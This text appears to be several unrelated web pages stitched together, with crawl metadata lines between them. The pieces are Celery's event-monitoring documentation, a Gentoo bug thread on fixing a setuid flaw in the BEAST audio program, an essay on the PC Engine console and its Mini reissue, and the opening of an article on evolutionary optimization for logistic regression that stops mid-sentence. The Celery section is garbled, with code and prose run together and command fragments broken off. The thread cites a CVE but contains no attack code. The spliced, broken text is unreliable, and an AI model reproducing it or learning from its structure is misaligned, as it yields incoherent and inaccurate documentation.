Redis pub/sub commands are global rather than database based._task_states: Monitors the number of tasks in each state (requires celerymon). The worker has the ability to send a message whenever some event happens. These events are then captured by tools like Flower, and celery events to monitor the cluster. events -c myapp.Camera --frequency=2.0 Cameras can be useful if you need to capture events and do something with those events at an interval. For real-time event processing you should use celery.events.Receiver directly, like in Real-time processing. Here is an example camera, dumping the snapshot to screen: from pprint import pformat from celery.events.snapshot import Polaroid class DumpCam(Polaroid): def on_shutter(self, state): if not state.event_count: # No new events since last snapshot. return print('Workers: {0}'.format(pformat(state.workers, indent=4))) print('Tasks: {0}'.format(pformat(state.tasks, indent=4))) print('Total: {0.event_count} events, %s {0.task_count}'.format( state)) See the API reference for celery.events.state to read more about state objects. Now you can use this cam with celery events by specifying it with the -c option: $ celery) To process events in real-time you need the following An event consumer (this is the Receiver) A set of handlers called when events come in. You can have different handlers for each event type, or a catch-all handler can be used (‘*’) State (optional) celery.events.State is a convenient in-memory representation of tasks and workers in the cluster that is updated as events come in. It encapsulates solutions for many common things, like checking if a worker is still alive (by verifying heartbeats), merging event fields together as events come in, making sure timestamps) This list contains the events sent by the worker, and their arguments. Sent when a task message is published and the CELERY_SEND_TASK_SENT_EVENT setting is enabled. Sent when the worker receives a task. Sent just before the worker executes the task. Sent if the task executed successfully. Runtime is the time it took to execute the task using the pool. (Starting from the task is sent to the worker pool, and ending when the pool result handler callback is called). Sent if the execution of the task failed. Sent if the task has been revoked (Note that this is likely to be sent by more than one worker). and the signum field set to the signal used. expired is set to true if the task expired. Sent if the task failed, but will be retried in the future. The worker has connected to the broker and is online. Sent every minute, if the worker has not sent a heartbeat in 2 minutes, it is considered to be offline. The worker has disconnected from the broker.
http://celery.readthedocs.org/en/latest/userguide/monitoring.html
CC-MAIN-2013-48
refinedweb
991
62.27
Bump to 0.7.1 please. :) * Fixed SUID security vulnerability by validating success of seteuid/setreuid, related security advisories, describing the vulnerability: * CVE-2006-2916 - artswrapper * CVE-2006-4447 - X.Org *** Bug 140937 has been marked as a duplicate of this bug. *** sound/gnome, please you provide an updated ebuild for this I have a compilation error with dev-scheme/guile-1.8.1-r1, even with use deprecated discouraged. @scheme: any idea about that ? (In reply to comment #3) > I have a compilation error with dev-scheme/guile-1.8.1-r1, even with use > deprecated discouraged. > @scheme: any idea about that ? without the actual error, all I can say is that maybe you need some other flags as well. Here it is : if x86_64-pc-linux-gnu-gcc -DHAVE_CONFIG_H -DG_LOG_DOMAIN=\"BSESCM\" -I. -I. -I.. -I.. -I. -I.. -pthread -pthread -I/usr/include/glib-2.0 -I/usr/lib64/glib-2.0/include -I/usr/include/glib-2.0 -I/usr/lib64/glib-2.0/include -DG_DISABLE_CONST_RETURNS -D_BIRNET_SOURCE_EXTENSIONS -march=athlon64 -O2 -pipe -DG_DISABLE_CHECKS -DG_DISABLE_CAST_CHECKS -fno-cond-mismatch -Wall -Wmissing-prototypes -Wmissing-declarations -Wno-cast-qual -Wno-pointer-sign -Wpointer-arith -Wredundant-decls -Wmissing-noreturn -ftracer -finline-functions -fno-keep-static-consts -MT bsescminterp.o -MD -MP -MF ".deps/bsescminterp.Tpo" -c -o bsescminterp.o bsescminterp.c; \ then mv -f ".deps/bsescminterp.Tpo" ".deps/bsescminterp.Po"; else rm -f ".deps/bsescminterp.Tpo"; exit 1; fi [lots of warnings] bsescminterp.c: In function 'signal_closure_marshal': bsescminterp.c:651: error: 'scm_catch_body_t' undeclared (first use in this function) bsescminterp.c:651: error: (Each undeclared identifier is reported only once bsescminterp.c:651: error: for each function it appears in.) bsescminterp.c:651: error: expected ')' before 'signal_marshal_sproc' bsescminterp.c:652: error: too few arguments to function 'scm_internal_cwdr' [again lots of warnings] this is in the "shell" subdirectory. [ebuild R ] dev-scheme/guile-1.8.1-r1 USE="deprecated discouraged elisp networking nls regex threads -debug -debug-freelist -debug-malloc" I really have no clue on how to fix that :/ the page seems to imply that guile-1.6 is needed. ok, if upgrading doesnt work, we need to backport the patch. i had a quick look and this should do the job: thanks stefan for the help, but older version are unfortunately affected by bug #131751 (and most likely guile incompatibilities also) I've commited 0.7.1 to the tree, this one depends on guile 1.6*, so I've pmasked it to not cause up/downgrades of guile. in guile-1.8 ebuild there are those lines : # Guile seems to contain some slotting support, /usr/share/guile/ is slotted, but there are lots of collisions. Most in /usr/share/libguile. Therefore I'm slotting this in the same slot as guile-1.6* for now. SLOT="12" so perhaps if scheme wants to help there, by either taking care of the b0rkage that has caused guile bump or by slotting it properly... I've only pmasked beast 0.7.1, feel free to pmask older versions also as imho they are broken. (In reply to comment #8) > so perhaps if scheme wants to help there, by either taking care of the b0rkage > that has caused guile bump or by slotting it properly... what borkage are you referring to that I could fix? I'd love to slot guile-1.8 separately, but I'm not sure it's possible. > what borkage are you referring to that I could fix? I'd love to slot guile-1.8 > separately, but I'm not sure it's possible. bah I've not managed to compile beast with guile 1.8. Try it, it's in the tree under pmask, you're probably much more able than I am to deal with guile. I've tried it. The beast developers have their work cut out for them I think. fixes for beast to compile with guile-1.8 which will be included in the next release: Any news on this one? Thanks marijn for the help here, beast 0.7.1 should be fine now, Adding arches as I suppose 0.7.1 will have to go stable and older versions will have to be removed. Thx Alexis. Updating whiteboard. TEST: test -x "/usr/bin/bsescm-0.7.1" Failed to verify installation of executable: /usr/bin/bsescm-0.7.1 make[1]: *** [check-installation] Error 1 make[1]: Leaving directory `/var/tmp/portage/media-sound/beast-0.7.1/work/beast-0.7.1/shell' make: *** [check-recursive] Error 1 I assume the check should be disabled. [ebuild N ] media-sound/beast-0.7.1 USE="mad -debug -static" Back to ebuild for now. Alexis please provide an updated ebuild. very annoying beast ;) 26 Mar 2007; Alexis Ballier <aballier@gentoo.org> +files/beast-0.7.1-noinstalltest.patch, beast-0.7.1.ebuild: Dont test if files are installed as they are not at the time we run src_test (In reply to comment #18) > very annoying beast ;) > > 26 Mar 2007; Alexis Ballier <aballier@gentoo.org> > +files/beast-0.7.1-noinstalltest.patch, beast-0.7.1.ebuild: > Dont test if files are installed as they are not at the time we run src_test So I cc arches again. x86 stable Thx Alexis and Christian for the quick response. Created attachment 114669 [details] compile-failure on ppc Doesn't compile on ppc. hmmm which linux-headers version do you have ? In which file is SIGTRAP defined ? (In reply to comment #23) > hmmm which linux-headers version do you have ? =sys-kernel/linux-headers-2.6.17-r2 > In which file is SIGTRAP defined ? /usr/include/asm/signal.h Ok I've been able to track and reproduce this error by compiling a cross toolchain and reading cpp output (ouch), it seems that there is a problem in glib headers : /usr/include/glib-2.0/glib/gbacktrace.h line 55 (glib 2.12.11): #else /* !__i386__ && !__alpha__ */ # define G_BREAKPOINT() G_STMT_START{ raise (SIGTRAP); }G_STMT_END #endif /* __i386__ */ but this file never includes signal.h on those non x86{,_64} nor alpha arches. while this could be fixed by including signal.h in any file using G_BREAKPOINT, I tend to think that's it's a glib bug. what do you think, should I just patch beast to resolve this security issue asap and then let the gnome team fix that or wait for a fix from the gnome team ? Thx Alexis. Since this appears to be suid root I would prefer a fix asap and the let the gnome ppl fix their error afterwards. then lets go : 30 Mar 2007; Alexis Ballier <aballier@gentoo.org> +files/beast-0.7.1-signalheader.patch, beast-0.7.1.ebuild: Include signal.h to workaround glib not including it causing compile failures on ppc (In reply to comment #27) > then lets go : > 30 Mar 2007; Alexis Ballier <aballier@gentoo.org> > +files/beast-0.7.1-signalheader.patch, beast-0.7.1.ebuild: > Include signal.h to workaround glib not including it causing compile > failures on ppc Thanks, ppc stable. I've never used BEAST but fail to see how you're going to escalate privileges unless you find another vulnerability in BEAST. hlieberman/Sound/gtk/Security do you know of any way of using this to gain root privileges without another vuln? sound or gnome: could someone explain why this app need setuid? Is it really necessary? according to this: It's just to get a -20 priority... I really don't see the point in doing this :/ Is it a kind of safety net to prevent jitters in case the box get overloaded? please advise. I don't personally use beast; but I assume, based on past experience with people using sound systems like JACK, that it is setuid root so that it can set itself to SCHED_FIFO (or SCHED_RR). There are workarounds for those to not need root; maybe Gentoo already does it for JACK? If so, beast could be modified to use that, or maybe just configured to use it. 200704-22, thanks everybody. Sorry for the delay.
https://bugs.gentoo.org/show_bug.cgi?id=163146
CC-MAIN-2021-39
refinedweb
1,349
68.16
15 December 2008 22:38 [Source: ICIS news] NEW YORK (ICIS news)--German specialty chemicals producer Evonik Industries and automobile maker Daimler now own stakes in a company that makes lithium-ion batteries, the companies said on Monday. As part of the deal, Daimler has taken a 49.9% interest in Li-Tec Vermogensverwaltung, a developer of lithium-ion batteries based in ?xml:namespace> The partners seek to engage a third shareholder with expertise in electrical and electronic systems integration, the official said.. Evonik and Daimler also plan to form a joint venture focused on the development and production of batteries and battery systems for use in both passenger cars and commercial vehicles. Daimler will hold 90 percent of the joint venture, the official said. Financial terms were not disclosed. The capacity available at Li-Tec and the joint venture will initially concentrate on the needs of Daimler, but the sale of cells and battery systems to third parties is also planned for the longer term, according to Evonik. “Evonik is the only company that can actually bring about commercial series production of battery cells of this kind,” said Werner Muller, CEO of Evonik. In recent years, Evonik has invested about €80m ($107m) in lithium-ion battery technology, according to the company. ($1 = €0.75) For more on Evonik
http://www.icis.com/Articles/2008/12/15/9179586/german-evonik-daimler-to-develop-lithium-ion-batteries.html
CC-MAIN-2014-42
refinedweb
219
52.19
A Tribute To The PC Engine I love this console. How successful will its Mini version be? Nintendo started it all. In November 2016, they took their 30-years-old Entertainment System, turned it on its head, and released the Classic: a working miniature of the original console with 30 built-in games from the vast original library, and a modern software interface which felt right at home in the 21st century. And it flew off the shelves. A year later, they tried it again with the Super NES. Same formula (driven by the same hardware internals), same great results, especially as far as Nintendo’s finance department is concerned. The systems sold a combined 10 million units by the end of Q2 2018 ¹. Following this success story, a bunch of other players jumped onto this retro-nostalgic bandwagon hoping for a piece of the pie and with varying degrees of success. How can we forget Sony’s king of the bargain bin PlayStation Classic? A much loved system back in the day which performed very badly in its nostalgic reissue mostly due to a dubious game selection and emulation issues. The latest release in this category is actually from Nintendo’s archenemy from back in the day, Sega, who is trying their hand at a mini Genesis/Mega Drive. However, much has already been written about the Genesis, both in its original form and in its miniaturized version, in the lead-up to its release in mid-September 2019. Here, I want to take you on a journey of discovery for a far more obscure system, the PC Engine/TurboGrafx, in preparation for its return (in mini-form) in March 2020. A bit of history The original PC Engine was released in Japan in 1987 by NEC and Hudson to great success. It was the first console of the 16-bit era in a world dominated by Nintendo and their 8-bit Famicom/NES, which was outselling their closest competitors at a ratio of 3 units to 1 ². Calling the system “the grandfather of the 16-bit era” is a bit of a misnomer, though, as the hardware was actually driven by an 8-bit CPU as we will see in more detail further on. Regardless, in 1987 its specs looked fantastic, and so did its graphics. By the time it was released in the States in 1989, however, other companies had not only caught up but also surpassed its hardware capabilities. The most prominent of these competitors was Sega, who had released the hardware beast that was the Genesis/Mega Drive just a couple of months before. This made the TurboGrafx — as the PC Engine came to be known stateside — a bit of a niche system outside its native land. The hardware was just not good enough to compete with the Genesis or Nintendo’s Super NES, and the market quickly moved on to these two latter systems. The 16-bit era console war was fought throughout the ‘90s by the two giants, Nintendo and Sega, with massive marketing budgets and a slew of games to back up their respective claims, leaving the poor PC Engine behind. Nevertheless, the broader success at home ensured high quality games were still made for the system, including fairly accurate and enjoyable ports of arcade blockbusters such as Street Fighter II and Ghouls ‘n’ Ghosts. Before we get on the games, however, let’s talk about the PC Engine’s hardware and physical design especially in the context of weaknesses against its contemporary competitors which undermined the system’s success in the market. Hardware The main hardware drawback of the PC Engine was its CPU, an 8-bit MOS 6502 derivative; it was close in design to Nintendo’s much older NES, although clocked at almost 4x the speed. This shortcoming was somewhat redeemed by flanking the main processor with reasonably powerful 16-bit custom graphic chips capable of displaying up to 482 colors on screen (out of a palette of 512). On the sound front, chirpy chip tunes were provided by a decent sound system integrated in the CPU itself ³, effectively producing sound and music which were on par with the console’s main competitors. In contrast, both the Genesis and the Super NES employed real 16-bit architectures, each with their own way to ensure graceful aging: the Sega system offering an overpowered hardware from the get go, while Nintendo allowed hardware enhancements to be built right into the cartridges. The other major drawback of the system is less to do with hardware power and more to do with UX. The console came with a single gamepad port, where all of its competitors offered two out of the box. In order to play games with your friends, you had to get a multitap accessory which — although allowing support for up to 5 players — was just an annoying extra expense for anybody looking for a quick Street Fighter II duel. The number of face buttons on the controllers themselves was also quite scarce: at launch, the PC Engine had a meagre two, whereas the Genesis had three and the SNES four (and an extra two shoulder buttons). A six button pad was only released much later on in the system’s life, to coincide with the release of Street Fighter II and around the time when Sega also upgraded their controller design to a six button layout. Despite all these flaws — and thanks to the popularity of the system in Japan — several revisions and enhancements were released throughout the years until the console’s ultimate demise in 1994. Some of these enhancements were revolutionary in their own right, such as the CD-ROM player that was released in late 1988, offering the first instance in history of the gaming experience which would become familiar in the second half of the 1990s and throughout the 2000s. Console design Although the chassis of the American version was somewhat conservative and in line with the common industrial design of its time, the Japanese original was more innovative and quite daring in its form factor. Sporting a broadly white and minimalist color scheme, the base console was roughly the size of a stack of four CD jewel cases, making for a very compact system unlike anything else on the market; this was years before Nintendo tried something vaguely similar with their GameCube, and later again with the Wii. This diminutive size was in part enabled by the physical form factor of the game cartridges. Whereas Nintendo and Sega distributed their games on boxy, chunky hunks of plastic, the folks at NEC/Hudson opted for a slimmer design that was vaguely reminiscent of a standard credit card, if somewhat thicker. This all contributed to create the look of a futuristic console which would have felt right at home on the piloting deck of a Mech Robot, but still somewhat held back by a less inspired control pad design. The games Lacking an exclusive franchise along the lines of Sonic or Mario, the strength of the PC Engine lied mainly in its arcade ports, complemented by a collection of JRPGs which included Ys and Far East of Eden. In fact, the selection of games for the PC Engine Mini is a good representation of what was available for the system, save a couple of glaring omissions (where is Street Fighter II?!). Here are a few titles taken from the TurboGrafx Mini list, which provide a fair insight in the library of 600-odd titles available for the system. PC Genjin/Bonk’s Adventure A fun platformer starring a bald caveman which was slated to become the console’s mascot. It did not happen. This game was eventually ported to other systems of the era, with the protagonist’s name being adapted to its new hosts (PC Genjin being a pun of PC Engine). Neutopia Somewhat reminiscent of The Legend of Zelda, this is a top-down action RPG with beautiful graphics that show the capabilities of the system. However, you must really be into dungeon exploration to enjoy this game, as it’s quite repetitive. If that’s not your thing but you still want a solid RPG experience, Ys I/II might be a better choice. Salamander A great example of the great arcade conversions available for this console. Salamander is a classic shoot-em-up that includes both horizontal and vertical scrolling stages. The PC Engine version remains faithful to the original by sporting awesome graphics and captivating sound. It’s damn hard though. Warning: this game is only available in the European and US versions of the Mini console. The Japanese version includes Far East of Eden instead. Bomberman ‘93 A port of the famous multiplayer battle game. Good graphics and hours of fun guaranteed, especially if playing in groups. Note that a multi-tap is required for group play on the original PC Engine, while the Mini version supports 2 simultaneous players directly (an adapter is still sold separately to allow additional players). Super Momotarō Dentetsu II For something out of left field, try this game. It’s a dice-based board game where the main objective is to accumulate wealth in a similar style to Monopoly. An understanding of Japanese is necessary to get anywhere, and up to 5 players are supported. My own take on the system It’s no secret that I love the PC Engine. I love its compact design, its simplicity, and its mini game cartridges that are even more compact than the classic GameBoy ones. Although I never owned the original back in the days, it is a system I always admired throughout the years, mainly because of its imperfections and limitations, straddling the line between 8-bit and 16-bit consoles, as a somewhat poetic instance of wabi-sabi ⁴ in electronics. My only disappointment in the Mini release is the lack of my favorite game for the system: Doraemon: Meikyū Daisakusen, released in the US under the name of Crater Maze, with different graphics. The Japanese version sports the popular blue cat from the famous manga / anime franchise going around a maze and collecting his favorite pancakes while setting up booby traps to avoid all sorts of ridiculous enemies. This game is a variation of the popular Kid no Hore Hore Daisakusen for the arcade, also ported to the NES and the Game Boy. The main attraction of this port is of course Doraemon being the hero here. Will the Mini succeed? There are many factors coming into play to determine the commercial success of this machine, especially outside Japan as the system was not that popular worldwide. My expectation is that public reception will mainly be based around the following factors. Aesthetics/build quality It’s easy to emulate the PC Engine, and it’s also easy to find most of its best games on other systems. The console will only be successful if it has a good build quality while faithfully reproducing the original. I have a Nintendo Super Famicom Classic that I bought in Japan and it is excellent in that respect. I don’t play it much, but it’s good to look at. Software One of the strengths of the SNES and NES Classic is the system software which presents the game catalog and deals with game saves. This can make or break the system, and I hope Konami’s implementation will follow closely in Nintendo’s footsteps, although I admit the SNES/NES Classic UI has a distinctive Nintendo feel to it. Emulation I don’t expect the system to have the same slowdown/stuttering problems as the PlayStation Classic as the hardware requirements to emulate the PC Engine are much lower. A good execution of the gameplay experience is essential to the success of the console. I don’t foresee any problems in this area. Game selection The games announced for the system are, as I said earlier, a good representation of what was available for the system. However, in the end you only get around 30 unique titles to choose from. Is that enough? Not sure, maybe not. A unique point about the game library is that all three versions of the console (US, Europe and Japan) will come preloaded with a selection of games that covers all worldwide regions. This means that some Japanese games will be available officially for the first time outside Japan, and vice-versa. Again, this might be a selling point for collectors, though I am not sure about the relevance for a casual player. In conclusion, yes the PC Engine is a niche system and its broader appeal is somewhat limited, especially outside of Japan. Its MSRP is also quite high at the moment at US$99/GB£99/JP¥11,550, further reducing its potential for mass adoption. Perhaps a drop to a more realistic US$59 would entice more non-Japanese gamers to part with their cash and give it a go. Having said that, its unique position in history and characteristic physical design might be enough to win over a new generation of fans, or entice a purchase from those who, like me, missed out on the original system back in the days. Will I buy it? Yes, in a heartbeat. I am going to order the PC Engine version from Amazon Japan, and probably start with the English version of Ys as soon as it arrives, followed by a few rounds of R-Type. I still wish they included Street Fighter II though. References [ 1 ] — Six Months Financial Results Briefing for Fiscal Year Ending March 2019 — Nintendo [ PDF ] [ 2 ] — Based on sales figures from Video Game Sales Wiki [ Website ] [ 3 ] — Specs from NECRetro.ORG — PC Engine [ Website ] [ 4 ] — Wikipedia — Wabi-Sabi [ Website ]
https://medium.com/super-jump/a-tribute-to-the-pc-engine-badd2369fe7c?source=collection_home---2------0-----------------------
CC-MAIN-2019-39
refinedweb
2,308
56.79
Problem: I want to convert a list of list into a dataframe. Setup: I have the following list: data = [[(1,0.8),(2,0.2)], [(0,0.1),(1,0.3),(2,0.6)], [(0,0.05),(1,0.05),(2,0.3),(3,0.4),(4,0.2)]] This is an LDA Document-Topic Probability List from gensim in which each list is a document and each tuple is one of five topic probabilities. (See an earlier question I posted on Stack Overflow here). The first element in the tuple represents the topic number, the second element is the probability that the topic probability for the document. Note that while some documents (like the 3rd list) can have up to five tuples (topic probabilities), gensim LDA does not output probabilities for topics with less 0.01 probabilities. Therefore, examples like document 1 and document 2 have less than five tuples. Goal: Use for loops to create a Document-Topic Probability matrix such that: ProbMatrix = [(0,0.8,0.2,0,0), (0.1,0.3,0.6,0,0), (0.05,0.05,0.3,0.4,0.2)] As noted above, for "missing" tuples (topics), zero's need to be plugged in. Once I get this list, I figure I can use pandas dataframe function to produce my final output (df) such that df = pd.DataFrame(ProbMatrix) My (Failed) Attempt: ProbMatrix = [] for i in data: #each document i for j in i: #each topic j if j[0] == 0: ProbMatrix[i,0].append(j[1]) elif j[0] == 1: ProbMatrix[i,1].append(j[1]) elif j[0] == 2: ProbMatrix[i,2].append(j[1]) elif j[0] == 3: ProbMatrix[i,3].append(j[1]) elif j[0] == 4: ProbMatrix[i,4].append(j[1]) The problem is how I'm referencing ProbMatrix because I'm receiving the following error: TypeError: list indices must be integers, not tuple Thank you for your help! Bonus (that is, it'd be even better if you can help): One problem I've found with gensim LDA is that, as mentioned, it does not output probabilities less than 0.01, even if minimum_probability = None. For example, see this earlier post. The example above is illustrative in that the topic probabilities sum to 1 for each document. However, in reality the output looks more like this: data = [[(1,0.79),(2,0.2)], # topic 1 probability 0.79 from 0.8 [(0,0.09),(1,0.3),(2,0.6)], # topic 0 probability 0.09 from 0.1 [(0,0.05),(1,0.05),(2,0.3),(3,0.4),(4,0.2)]] What I'm looking for is instead of putting zero into unknown topic probabilities, instead make the remaining missing topics an even probability such that topic probabilities for each document equal 1. For example, this would result in a ProbMatrix: ProbMatrix = [(0.0033,0.79,0.2,0.0033,0.0033), (0.09,0.3,0.6,0.005,0.005), (0.05,0.05,0.3,0.4,0.2)] I'm not 100% sure what you are asking but I think this is what you are looking for to get the probmatrix list you showed. you can do it like this data = [[(1,0.8),(2,0.2)], [(0,0.1),(1,0.3),(2,0.6)], [(0,0.05),(1,0.05),(2,0.3),(3,0.4),(4,0.2)]] probmatrix = [] for i in data: tmp = [0,0,0,0,0] for j in i: tmp[j[0]] = j[1] probmatrix.append(tmp) df = pd.DataFrame(probmatrix) print df 0 1 2 3 4 0 0.00 0.80 0.2 0.0 0.0 1 0.10 0.30 0.6 0.0 0.0 2 0.05 0.05 0.3 0.4 0.2 Since you know there will only be five elements you can make a tmp list initialized with 5 zeros and just replace the ones that are non-zero Not sure if it what you want but i is a document, and you are using it to adress ProbMatrix. you can make ProbMatrix = {} instead of ProbMatrix = [] to use it as a dictionary. You cannot reference a list of list with [i,j], in your case it's a list of tuples. You should first have a list of list. Try: ProbMatrix[i].append(j[1]) # add a number to the list at row i Maybe I didn't get why you need 2 indices. In this case it should be: ProbMatrix[i][j].append(j[1]) If you know the desired shape of your output you can use np.zeros to create a zero filled Numpy array and fill accordingly. import numpy as np import pandas as pd probMatrix = np.zeros(shape=(3,5)) # size of (num docs, k topics) for doc_num, probs in enumerate(data): for k_index, prob in probs: probMatrix[doc_num, k_index] = prob Which will return: array([[ 0. , 0.8 , 0.2 , 0. , 0. ], [ 0.1 , 0.3 , 0.6 , 0. , 0. ], [ 0.05, 0.05, 0.3 , 0.4 , 0.2 ]]) Which can be loaded directly into a pandas dataframe if needed, or is pretty useful just as it is.
http://m.dlxedu.com/m/askdetail/3/c49c828ae4d9a486f1ff539a936c711d.html
CC-MAIN-2018-30
refinedweb
873
65.52
UPDATE 10 Secs later Fixed properly now, and thanks to JF and Gauden. UPDATE I have found a temporary fix by saving the IDLE file in the directory the other working file is in. (I would still like to know how to fix it entirely if I can.) That's not a permanant fix, so if you want to try and help make it work wherever the file is saved, feel free. This is the start of a python file: #!/usr/bin/python # -*- coding: utf-8 -*- import wikipedia import pagegenerators import sys import re import pywikibot from pywikibot import * >>> import wikipedia Traceback (most recent call last): File "<pyshell#9>", line 1, in <module> import wikipedia ImportError: No module named wikipedia >>> imp.find_module("wikipedia.py","f:/ake/pa/th/") Traceback (most recent call last): File "<pyshell#7>", line 1, in <module> imp.find_module("wikipedia.py","f:/ake/pa/th/") ImportError: No frozen submodule named f:/ake/pa/th/.wikipedia.py . wikipedia.py sys.path >>> import sys >>> sys.path.append("c/users/adam/py") #the same error... C:\Python27\python.exe C:\Python27\pythonw.exe Traceback (most recent call last): File "<pyshell#20>", line 1, in <module> print os.environ['PYTHONPATH'].split(os.pathsep) File "C:\Python27\lib\os.py", line 423, in __getitem__ return self.data[key.upper()] KeyError: 'PYTHONPATH' C:\Program Files\Common Files\Microsoft Shared\Windows Live C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live C://Python27 C:\Program Files (x86)\IVI Foundation\VISA\WinNT\Bin C:\Program Files (x86)\QuickTime\QTSystem\ C:\Program Files (x86)\Windows Live\Shared EDIT The answer to the above question proved to be fairly simple, but I am editing this answer as a possible troubleshooting checklist for future reference, and as a checklist for others who may need to prepare questions of this nature in the future. >>> import wikipedia >>> print wikipedia.__file__ This will give you the path to the compiled module, and is one clue. (See also this question). >>> import sys >>> print sys.executable Try this in the shell and in an IDLE script. If the two results are different, then you are using two Python interpreters and only one of them has a path that points to the wikipedia module. sys.path? Also repeat this in both shell and as a script in IDLE. >>> print '\n'.join( sys.path ) (You may be able to use sys.path.append("d:/irectory/folder/is/in") to add that location to the sys.path. This should add that directory to the list of places Python looks for modules.) Finally repeat this in both shell and as a script in IDLE. >>> import os >>> print '\n'.join( os.environ['PATH'].split(os.pathsep) ) Again note the two results (from shell and from IDLE) and see if there is difference in the PYTHONPATH in the two environments. If all these tests prove inconclusive, I would add as much of this information as you can to your question as it would help give you specific further leads. Also add what OS you are using and any tracebacks that you get.
https://codedump.io/share/MMnEARGWJzMk/1/imports-working-with-raw-file-but-not-in-idle
CC-MAIN-2017-09
refinedweb
514
65.12
AWS Lambda is a service that allows you deploy a function to the web. There are no servers to maintain, and billing is based on the compute time your function uses. At the end of 2015, Amazon launched a set of AWS Lambda blueprints to help developers get up and running with Lambda. These consists of Python and JavaScript examples, based around integrating with Slack (“chat-based DevOps”, in their words). But Amazon omitted to mention the JVM. This post fills the gap and shows you how to use AWS Lambda with Scala and Slack. What we’re going to make The Amazon blueprints echo back what you type into Slack. I want to do something more useful than that. I want this kind of interaction: I ask for the time in a bunch of places via /time place-name and my AWS Lambda function sends back the current time in all those places. Lambda and the API gateway Using AWS Lambda to do this involves three things: - configuring Slack to recognize the command; - writing some code; and - deploying the code to AWS Lambda. To be more precise, AWS Lambda is a compute service, not a web service. What triggers the computation is an event. That can be something like a object being changed in an S3 bucket. For the blueprint examples to integrated with Slack, they have to be triggered from a web request. Here’s the scenario: - I type /time new-yorkin Slack; - Slack is configured to send information about the command to a web service; and - Slack shows me the output from calling the web service. To trigger a Lambda via the web you need the Amazon API Gateway. That’s what the blueprints use. Scala code Before we dig into the deployment details, let’s deal with the easiest part: the Scala code. The first question you probably have is: what’s the type-signature of the Lambda? Amazon will recognize a range of type signatures, but at the core the service is a transformation from JSON to JSON. There’s automatic serialization for various data types, but they are focused on Java conventions. As a Scala developer, I don’t make a lot of use of JavaBeans, so I’m going to work with the raw input and output: import java.io.{InputStream, OutputStream} def time(in: InputStream, out: OutputStream): Unit = ??? Not the prettiest thing, but something we can work with. The in stream will be JSON as text; and the out stream will be JSON as text. The example code I’ve put on GitHub does this: - Reads the input stream. - Uses Circe to decode it into a case class. - Extracts what it needs, and produces another case case with all the results in it. - Uses Circe again to serialize the results back as JSON to Amazon, and there onward to Slack. The Lambda function runs on a Java 8 JVM, and I use the built in java.time API to do compute all the different time information. Deployment The deploy the code we need to package it, and we need something to deploy it to. The packaging is done with sbt-assembly, as Tim Wagner and Sean Reque have done in their example for S3. This produces a JAR file. To deploy it, you can create a Lambda environment and connect it to the API Gateway. But there’s a trick you can use to save some time. In the AWS Lambda Console, use the existing “slack-echo-command-pyton” example, and at the last step switch from Python to Java 8. You’ll be promoted to upload a JAR file. If all goes well, you’ll end up with an API Gateway that looks like this: The “Integration Request” has some interesting settings, which we will now take a look at. The web is not JSON This is the messy part. AWS Lambda is based on JSON, but the web is not all about JSON. In fact, the Slack service posts standard web form data, not JSON. We need to convert it to JSON before our Lambda function is called. This can be handled by the AWS API Gateway’s “mapping template” functionality. Hold your nose, because this smells. For us, we need to go from x-www-form-urlencoded data that Slack sends us, into JSON: That stuff on the right is Velocity markup. Amazon have a scripting engine which you can use to re-write a web request into JSON. Thankfully, Christian E Willman has figured out what that template should be. And I’ve started a rudimentary emulation of the Amazon Mapping Template environment to be able to debug these kinds of templates. As terrifying as that is, it does turn a request into JSON. Hopefully Amazon will add support for form encoding to Lambda one day. The final step: plugging in Slack Configuring a new command in Slack is best explained by Slack. The one thing you need is the Amazon Gateway URI to your Lambda service. It’s shown in the AWS API Gateway Dashboard. It’ll be something like:. Summary With those pieces in place, we have deployed a JAR file containing a Scala function to AWS Lambda. We’ve wired up Slack to call the function, and arranged for the API Gateway to turn Slack’s form data into JSON. In theory, our function can now scale out to as many clients as Amazon can support. That should be a pretty big number. As for performance, I only have informal information at the moment. The function typically executes in something like 80ms. However, there’s a great deal of variation in that. For cold-start up, if no requests have been seen for some time, those values go almost to 3s. AWS Lambda works. You can use it with Scala, and may play an important role in web development. I can see the immediate benefit for micro-sites and services, as well for scheduled work or work reacting to other events.
http://underscore.io/blog/posts/2016/02/01/aws-lambda.html
CC-MAIN-2017-26
refinedweb
1,006
73.47
The Data Science Lab Resident data scientist Dr. James McCaffrey of Microsoft Research turns his attention to evolutionary optimization, using a full code download, screenshots and graphics to explain this machine learning technique used to train many types of models by modeling the biological processes of natural selection, evolution, and mutation. Evolutionary optimization is a technique that can be used to train many types of machine learning models. Evolutionary optimization loosely models the biological processes of natural selection, evolution, and mutation. Although it's possible to learn about evolutionary optimization by seeing how it works with an abstract problem, in my opinion it's better to start with a concrete example. In this article I demonstrate how to use evolutionary optimization to train a logistic regression model. Along the way, I'll explain how to adapt the example to other types of machine learning models. Logistic regression classification is arguably the most fundamental machine learning technique. Logistic regression can be used for binary classification, for example predicting if a person is male or female based on predictors such as age, height, weight, and so on. Take a look at the demo program in the screenshot in Figure 1. The goal of the demo is to predict the authenticity of a banknote (think dollar bill or euro) based on four predictor values (variance, skewness, kurtosis, entropy). The demo sets up a population of six possible solutions then uses eight generations of evolutionary optimization to find successively better solutions. Behind the scenes, the demo program sets up a training dataset of 40 items. In the first generation, the best solution is at [5] in the population and that solution has prediction accuracy of 60 percent (24 correct, 16 wrong) and error of 0.2266. After eight generations of evolution, a solution is found that scores 87.50 percent accuracy (35 correct, 5 wrong) with 0.0956 error. The demo concludes by displaying the four weights and one bias values for a logistic regression model: (-0.9435, -0.8266, -0.2915, -0.6601, -0.0369). In a non-demo scenario, these values would be used to make a prediction, or be saved to file for later use. This article assumes you have intermediate or better skill with C# and a basic understanding of logistic regression but doesn’t assume you know anything about evolutionary optimization. The code for demo program is a bit too long to present in its entirety in this article but the complete code is available in the associated file download. Understanding the Data The demo program uses a small 40-item subset of a well-known benchmark collection of data called the Banknote Authenticity Dataset. The full dataset has 1,372 items, with 762 authentic and 610 forgery items. You can find the complete dataset in many places on the Internet. The raw data looks like: 3.6216, 8.6661, -2.8073, -0.44699, 0 4.5459, 8.1674, -2.4586, -1.4621, 0 . . . -3.5637, -8.3827, 12.393, -1.2823, 1 -2.5419, -0.65804, 2.6842, 1.1952, 1 Each line represents a banknote. The first four values on each line are characteristics of a digital image of the banknote: variance, skewness, kurtosis, and entropy. The fifth value on a line is 0 for an authentic note and 1 for a forgery. The demo program uses only the first 20 authentic notes and the first 20 forgeries of the full dataset. kurtosis of the 40 data items used in the demo. The graph shows that classifying a banknote as authentic or forgery is 